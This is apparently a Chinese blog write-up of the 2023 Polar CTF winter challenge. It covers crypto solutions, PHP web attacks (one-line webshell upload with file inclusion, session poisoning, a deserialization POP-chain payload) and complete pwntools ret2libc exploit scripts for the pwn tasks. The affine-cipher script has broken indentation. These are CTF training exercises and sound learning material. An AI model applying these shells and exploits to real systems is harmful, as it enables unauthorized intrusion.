2023Polar CTF冬季个人挑战赛部分wp

最新推荐文章于 2024-04-10 04:44:24 发布
最新推荐文章于 2024-04-10 04:44:24 发布
阅读量369 收藏 1
点赞数 4
分类专栏: CTF刷题 文章标签: 前端 javascript 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZJPC007/article/details/134901525
版权

第一次参加polarctf的比赛,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。

题目还能复现的,在平台上就能做

https://www.polarctf.com/#/

misc

1-1 签到喵

 

 crypto

2-5base

需要base64换表

先将j2rXjx8wSZjD根据给出的密码表进行替换成正常的base

然后base解码

 2-6AFF

仿射加密法

题目输出没给,只能爆破ab

采用爆破的方法,寻找满足的flag

这里都要转换成小写字母,因为后面ascci-65操作的

flag = "WMPTPTRGGPED"

flaglist = []

for i in flag:
    flaglist.append(ord(i) - 65)
for a in range(1, 26):
    for b in range(1, 26):
        flags = ""
        for i in flaglist:
            for j in range(0, 26):
                c = (a * j - b) % 26
                    if (c == i):
                        flags += chr(j + 65)
         print('flag{' + flags + '}')

 web

3-1 cool

3-5 ezphp

 暴露给爬虫了,联想到robots.txt

 File.php 一个文件包含

 upload.php 一个文件上传

上传一个文件名为shell.jpg,文件内容为一句话木马

然后文件包含就行

 3-6 你的马呢?

http://fb602834-16d0-4a66-ad42-cab8127f56f3.www.polarctf.com:8090/index.php?file=php://filter/read=convert.base64-encode/resource=upload.phphttp://fb602834-16d0-4a66-ad42-cab8127f56f3.www.polarctf.com:8090/index.php?file=php://filter/read=convert.base64-encode/resource=upload.php

有文件内容检测

用<?=代替<?php

上传一个文件名为shell.jpg,文件内容为一句话木马

然后文件包含就行

 3-8 phpurl

 

 这里有一个url解码操作,用burpsuite将xss进行两次url编码

 Payload: index.php?sys=%2578%2578%2573

 

 flag{5caecd63b7dca4bcee15d262eb3af4f4}

 3-10 你想逃也逃不掉

源码如下

<?php
/*
    https://ytyyds.github.io/ (与本题无关)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
    return preg_replace'/phtml|php3|php4|php5|aspx|gif/',''$string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';

$ans filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
    echo file_get_contents('flag.php');
}

需要构造字符串逃逸去绕过

参数如下

 3-11 safe_include

思路:构造一句话写入session

根据 参数包含 /tmp/sess_写入值

题目源码

<?php 
show_source(__FILE__); 
@session_start();

ini_set('open_basedir''/var/www/html/:/tmp/'); 

$sys = @$_SESSION['xxs'];
if (isset($_GET['xxs'])) {
    $sys $_GET['xxs'];
}

@include $sys;

$_SESSION['xxs'] = $sys;

先进行构造参数一句话木马

再包含  ?xxs=/tmp/sess_45127ho2viath8q3602pobfu71

 成功读取flag

 3-12 苦海

反序列化,构造pop链

<?php
class User
{
    public $name;
    public $flag;
}
class FileRobot
{
    public $filename = '../flag.php';
    public $path;
}

class Surrender
{
    private $phone;
    public $promise;
}

$user = new User();
$s = new Surrender();
$f1 = new FileRobot();
$f2 = new FileRobot();
$f1->path = $f2;
$user->name = $s;
$user->name->file = ['filename' => $f1];

// 序列化和输出

echo urlencode(serialize($user));

利用如下pop:

O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A3%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3BN%3Bs%3A7%3A%22promise%22%3BN%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3BN%3B%7D%7D%7D%7Ds%3A4%3A%22flag%22%3BN%3B%7D

获得:hi, Welcome to Polar D&N ~ PD9waHAgDQoJJGZsYWcgPSAnZmxhZ3s2M2RkMGU5ZmJhZGQ2NjM1NDJhMmY4ZWExY2NjNjc2NX0nOw0KCT8+

Base64解密得到flag

pwn

5-4 look

32位程序,开了栈不可执行

用Ida反编译

在start函数中存在栈溢出漏洞

但程序没有可以获取shell的函数,要先泄露libc,找到system,再通过栈溢出getshell

简单的32位ret2libc

Exp:

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

p=remote('120.46.59.242',2141)


write_plt=0x80483E0

write_got=0x804A018

main=0x8048410


payload=b'a'*108+p32(0)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)

p.sendline(payload)

write_addr=u32(p.recv(4))

print(hex(write_addr))

libc_base=write_addr-0x0d44d0

bin_sh=libc_base+ 0x15912b

system=libc_base+ 0x03a950

payload=b'a'*108+p32(0)+p32(system)+p32(main)+p32(bin_sh)#+p32(bin_sh)+p32(8)

p.sendline(payload)



p.interactive()

5-10 05ret2libc_64

64位的程序,开了NX

用ida反编译

通过分析在putting函数中发现存在栈溢出漏洞

但程序没有可以获取shell的函数,要先通过泄露libc地址,来找到sytem,再通过栈核栈溢出,来执行system(“/bin/sh”)

64位的Ret2libc

EXp:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p=remote('120.46.59.242',2124)

puts_plt=0x4005A0 
gets_got=0x601038
pop_rdi=0x400843
main=0x400610
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(gets_got)+p64(puts_plt)+p64(main)
p.recvuntil('question:\n')
p.sendline(payload)
p.recvuntil('Maybe the answer is 0\n')
gets_got=u64(p.recv(6).ljust(8,b'\x00'))
libc_base=gets_got- 	 	0x06ed90
bin_sh=libc_base+  	0x18ce57
system=libc_base+ 	0x0453a0

payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(main)
p.sendline(payload)

p.interactive()

 

XFocus.
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf赛事了解
belife9999的博客
05-16 3327
国内赛事: XCTF赛事:国内最权威最高技术水平与最大影响力的ctf赛事平台 强网杯:最权威的国家级安全比赛,中央网信办网络安全协调局指导 红帽杯:广东省公安厅、广东省计算机网络安全协会举办 AliCTF:阿里安全技术竞赛,有阿里巴巴公司组织 TCTF:腾讯信息安全争霸赛,由腾讯安全联合实验室主办 BCTF:百度全国网络安全技术对抗赛,由百度安全主办 WCTF:世界黑客大师赛,油360Vulan团队组织 HCTF:由杭州电子科技大学信息安全协会主办的CTF ISCC:全国大学生信息安全与对抗技术竞赛,由北理
polarDB for Pgsql
08-26
阿里云的rpm安装包
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1517
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
PolarCTF2023冬季个人挑战赛wp含web、misc、crypto
HvAng10的博客
12-14 1748
是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。得到一个flag.txt,里面的内容很明显是zip,改后缀,要密码,binwalk一下看是不是伪加密,拿到了flag,可惜是假的。emmmm,卡住了,笨b卡在了安装gaps上了,emmm,giao。
记一题CTF safe_include
FROM_my_world的博客
03-11 1465
记一题CTF safe_include
PolarD&amp;N-CTF-web方向-困难_polard&amp;n 没人能拒绝猫猫 ctf
最新发布
2401_84181501的博客
04-10 899
共20个字符,我们只需要在前面放上20个x变成20个yy。这样就能达成溢出的目的。字符串变多溢出的原理,就是由于序列化时那个s:后面的长度记录数字是根据没替换的字符串来的。也就是说我们后面伪造的东西多长,就让他溢出多少个字符。这样前面s:只会读取替换后的字符。而伪造的字符串就会变成我们需要的东西。然后进去当payload:然后就得到了flag。
PolarCTF 2023冬季个人挑战赛 WriteUp (web部分)
m0_62652276的博客
12-14 363
PolarCTF 2023冬季个人挑战赛 web部分赛题 WriteUp
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
Jay17的博客
12-10 2462
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
Xshell会话文件解密获取密码
Last Dance !
12-03 1344
软件使用C#开发,运行在Windows上,64位,需要依赖.net环境,软件大小只有几百K,非常小巧,功能简单。可以选在会话文件,支持多选,也可以选择会话目录,会递归获取所有会话文件。如果设置了主密码可以输入主密码,没有设置就空着,点击解密,就看到所有会话的密码了。
【PolarCTF】天干地支
m0_73818758的博客
09-24 244
· 运行得到flag:flag{JIAOJIAOYYDS}
NB!更方便Xshell本地密码破解工具
潇湘信安的博客
07-19 2142
XshellCrack是基于SharpXDecrypt的二次开发,用go语言重写,增加了注册表查询设置,更方便xshell本地密码破解。
CODE_matlab_polarcode_code_polar_
10-04
POLAR CODE MASTER polar code master image
Polar编码matlab程序
03-26
matlab实现的Polar codes源程序
polardb-jdbc18.zip
10-20
polardb-jdbc18
Polar编码误码率matlab仿真,调制方式采用QPSK,译码算法采用SCL,信道为Awgn【包含程序操作录像,代码部分注释】
11-17
对于Polar码的误码率仿真,使用QPSK调制和SCL(连续消除列表,分别对比1,2,4三种情况)译码算法,以及在AWGN(加性白高斯噪声)信道中的仿真。最后输出误码率曲线。 4.注意事项:注意MATLAB左侧当前文件夹路径,...
2016 TSCTF 个人
think_ycx的专栏
04-03 672
pwn1thoughtsint sub_804857D() { int v1; // [sp+10h] [bp-20h]@1 setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:"); r
ctf 个人赛总结
西部壮仔的博客
08-09 3134
1.web 1. 从题目上看这道题得想让我们做的是绕过is_numeric 函数和intval函数a2可以用16进制和科学计数法来绕过is_numeric函数,hash_hmac函数对数组加密返回为空,我们就可以控制这个函数,我们可以把这些代码拷贝下来算出hmac的值让hmac的值让hmac的值让a3=这个值绕过die函数最后的构造为?a1=[]=3$a2=1e9&ccb3fd8a1db...
CTF比赛工具自收集
热门推荐
我的学习笔记
02-28 1万+
点滴积累,以免以后需要了又找不到了。综合{1、CTF工具免费集:https://www.ctftools.com/down/2、聊天机器人助手:https://github.com/CylanceSPEAR/CyBot}密码学{1、培根密码在线解密:https://netair.xyz/tools/%E5%9F%B9%E6%A0%B9%E5%AF%86%...
ctf比赛的三种形式
qq_33881738的博客
03-10 1万+
竞赛模式编辑 CTF竞赛模式具体分为以下三类: 一、解题模式(Jeopardy) 在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。 二、攻防模式(Attack-Defense) 在...
polar transform
11-11
Polar Transform是一种图像处理技术,它可以将直角坐标系下的图像转换为极坐标系下的图像。在极坐标系下,图像的中心点被定义为原点,图像的每个像素点被表示为它们的极径和极角。这种转换可以用于减小两种视角图像的域差异,从而提高图像检索的性能。在极坐标系下,图像的旋转和缩放变得更加容易,因此Polar Transform也被广泛应用于图像处理和计算机视觉领域。 下面是一个使用OpenCV库实现Polar Transform的Python代码示例: ```python import cv2 import numpy as np # 读取图像 img = cv2.imread('image.jpg') # 将图像转换为灰度图像 gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 计算图像中心点 height, width = gray.shape center = (width // 2, height // 2) # 计算图像的最大半径 radius = int(np.sqrt((height / 2) ** 2 + (width / 2) ** 2)) # 进行Polar Transform polar = cv2.linearPolar(gray, center, radius, cv2.WARP_FILL_OUTLIERS) # 显示原始图像和Polar Transform后的图像 cv2.imshow('Original Image', img) cv2.imshow('Polar Transform', polar) cv2.waitKey(0) cv2.destroyAllWindows() ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值